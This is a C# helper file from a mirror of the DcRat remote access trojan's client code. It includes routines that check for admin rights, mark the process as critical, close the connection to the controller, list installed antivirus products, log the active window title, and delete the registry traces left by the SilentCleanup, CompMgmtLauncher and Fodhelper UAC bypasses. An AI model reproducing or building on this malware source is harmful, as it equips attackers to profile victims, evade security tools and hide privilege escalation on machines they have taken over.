mirror of https://github.com/qwqdanchun/DcRat.git
134 lines
4.2 KiB
C#
134 lines
4.2 KiB
C#
using Client.Connection;
|
|
using System;
|
|
using System.Collections.Generic;
|
|
using System.Management;
|
|
using System.Security.Principal;
|
|
using System.Drawing.Imaging;
|
|
using System.Runtime.InteropServices;
|
|
using static Client.Helper.NativeMethods;
|
|
using System.Text;
|
|
using System.IO;
|
|
using System.Windows.Forms;
|
|
using System.Threading;
|
|
using Microsoft.Win32;
|
|
|
|
namespace Client.Helper
|
|
{
|
|
public static class Methods
|
|
{
|
|
public static bool IsAdmin()
|
|
{
|
|
return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
|
|
}
|
|
public static void ClientOnExit()
|
|
{
|
|
try
|
|
{
|
|
if (Convert.ToBoolean(Settings.BS_OD) && IsAdmin())
|
|
ProcessCritical.Exit();
|
|
MutexControl.CloseMutex();
|
|
ClientSocket.SslClient?.Close();
|
|
ClientSocket.TcpClient?.Close();
|
|
}
|
|
catch { }
|
|
}
|
|
|
|
public static string Antivirus()
|
|
{
|
|
try
|
|
{
|
|
string firewallName = string.Empty;
|
|
// starting with Windows Vista we must use the root\SecurityCenter2 namespace
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(@"\\" + Environment.MachineName + @"\root\SecurityCenter2", "Select * from AntivirusProduct"))
|
|
{
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
{
|
|
firewallName += mObject["displayName"].ToString() + "; ";
|
|
}
|
|
}
|
|
firewallName = RemoveLastChars(firewallName);
|
|
|
|
return (!string.IsNullOrEmpty(firewallName)) ? firewallName : "N/A";
|
|
}
|
|
catch
|
|
{
|
|
return "Unknown";
|
|
}
|
|
}
|
|
public static string RemoveLastChars(string input, int amount = 2)
|
|
{
|
|
if (input.Length > amount)
|
|
input = input.Remove(input.Length - amount);
|
|
return input;
|
|
}
|
|
public static ImageCodecInfo GetEncoder(ImageFormat format)
|
|
{
|
|
ImageCodecInfo[] codecs = ImageCodecInfo.GetImageDecoders();
|
|
foreach (ImageCodecInfo codec in codecs)
|
|
{
|
|
if (codec.FormatID == format.Guid)
|
|
{
|
|
return codec;
|
|
}
|
|
}
|
|
return null;
|
|
}
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
|
|
public static void PreventSleep()
|
|
{
|
|
try
|
|
{
|
|
SetThreadExecutionState(EXECUTION_STATE.ES_SYSTEM_REQUIRED | EXECUTION_STATE.ES_CONTINUOUS | EXECUTION_STATE.ES_DISPLAY_REQUIRED);
|
|
}
|
|
catch { }
|
|
}
|
|
|
|
public static string GetActiveWindowTitle()
|
|
{
|
|
try
|
|
{
|
|
const int nChars = 256;
|
|
StringBuilder buff = new StringBuilder(nChars);
|
|
IntPtr handle = GetForegroundWindow();
|
|
if (GetWindowText(handle, buff, nChars) > 0)
|
|
{
|
|
return buff.ToString();
|
|
}
|
|
}
|
|
catch { }
|
|
return "";
|
|
}
|
|
|
|
public static void ClearSetting()
|
|
{
|
|
try
|
|
{
|
|
//Silent Cleanup
|
|
RegistryKey key;
|
|
key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Environment");
|
|
if (key.GetValue("windir") != null)
|
|
{
|
|
key.DeleteValue("windir");
|
|
}
|
|
|
|
key.Close();
|
|
}
|
|
catch { }
|
|
try
|
|
{
|
|
//CompMgmtLauncher
|
|
Registry.CurrentUser.OpenSubKey("Software", true).OpenSubKey("Classes", true).DeleteSubKeyTree("mscfile");
|
|
}
|
|
catch { }
|
|
try
|
|
{
|
|
//Fodhelper
|
|
Registry.CurrentUser.OpenSubKey("Software", true).OpenSubKey("Classes", true).DeleteSubKeyTree("ms-settings");
|
|
}
|
|
catch { }
|
|
}
|
|
}
|
|
}
|